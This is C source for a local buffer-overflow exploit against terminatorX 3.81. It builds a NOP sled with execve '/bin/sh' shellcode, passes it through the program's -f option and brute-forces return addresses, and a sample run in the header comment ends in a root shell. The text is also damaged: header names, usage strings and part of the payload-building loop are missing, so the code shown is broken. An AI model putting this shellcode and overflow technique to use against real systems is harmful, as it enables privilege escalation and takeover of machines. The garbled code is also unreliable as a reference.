/* TerminatorX V. ][-b [-s ]]
*
* -r : no bruteforcing, try to execute shellcode with as return address
* -b: enables bruteforcing
* -s: bruteforces by using return address from to 0x00000000
*
* Example:
*
*root@li0n7:/tmp/test/exploits# ./terminatorX-exp -b
*
* exploit: terminatorX V. ][-b [-s ]]
*
*[+] Starting bruteforcing...
*[+] Testing 0xbffff734...
*terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
*terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
*...
*[+] Testing 0xbffff66c...
*terminatorX Release 3.81 - Copyright (C) 1999-2003 by Alexander König
*terminatorX comes with ABSOLUTELY NO WARRANTY - for details read the license.
*...
*tX: err: Error parsing terminatorXrc.
*tX: Failed loading terminatorXrc - trying to load old binary rc.
*+ tX_warning: LADSPA_PATH not set. Trying /usr/lib/ladspa:/usr/local/lib/ladspa
** tX_error: tX: Error: couldn't access directory "/usr/lib/ladspa".
*+ tX_warning: Plugin "Sine Oscillator (Freq:audio, Amp:audio)" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "Sine Oscillator (Freq:control, Amp:control)" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "Stereo Amplifier" disabled. Not a 1-in/1-out plugin.
*+ tX_warning: Plugin "White Noise Source" disabled. Not a 1-in/1-out plugin.
*warning: failed to load external entity "%90%90...%90%901%C0Ph//shh/bin%...%BFl%F6%FF%BF"
*
*(terminatorX:3085): WARNING **: Invalid UTF8 string passed to pango_layout_set_text()
*sh-2.05b# exit *exit *[+] Exited: shell's ret code = 0
*[+] Ret address found: 0xbffff66c
*
*/
#include
#include
#include
#include
#include
#include
#define BSIZE 200
#define D_START 0xbffff734
#define PATH "/usr/local/bin/terminatorX"
#define RET 0xbffff69e
char shellcode[] "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char *buffer,*ptr;
void
checkme(char *buffer)
{
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
exit(0);
}
return;
}
void
exec_vuln()
{
execl(PATH,PATH,"-f",buffer,NULL);
}
int
tease()
{
pid_t pid;
pid_t wpid;
int status;
pid = fork();
if ( pid == -1 ) {
fprintf(stderr, " [-] %s: Failed to fork()\n", strerror(errno));
exit(13);
} else if ( pid == 0 ) {
exec_vuln();
} else {
wpid = wait(&status);
if ( wpid == -1 ) {
fprintf(stderr,"[-] %s: wait()\n", strerror(errno));
return 1;
} else if ( wpid != pid )
abort();
else {
if ( WIFEXITED(status) ) {
printf("[+] Exited: shell's ret code = %d\n", WEXITSTATUS(status));
return WEXITSTATUS(status);
} else if ( WIFSIGNALED(status) ) {
return WTERMSIG(status);
} else {
fprintf(stderr, "[-] Stopped.\n");
}
}
}
return 1;
}
int
make_string(long ret_addr)
{
int i;
long ret,addr,*addr_ptr;
buffer = (char *)malloc(512);
if(!buffer)
{
fprintf(stderr,"[-] Can't allocate memory, exiting...\n");
exit(-1);
}
ret = ret_addr;
ptr = buffer;
memset(ptr,0x90,BSIZE-strlen(shellcode));
ptr += BSIZE-strlen(shellcode);
for(i=0;i][-b [-s ]]\n\n",argv0);
}
int
main(int argc,char *argv[])
{
char * option_list = "br:s:";
int option,brute = 0, opterr = 0;
long ret,start = D_START;
banner(argv[0]);
if (argc
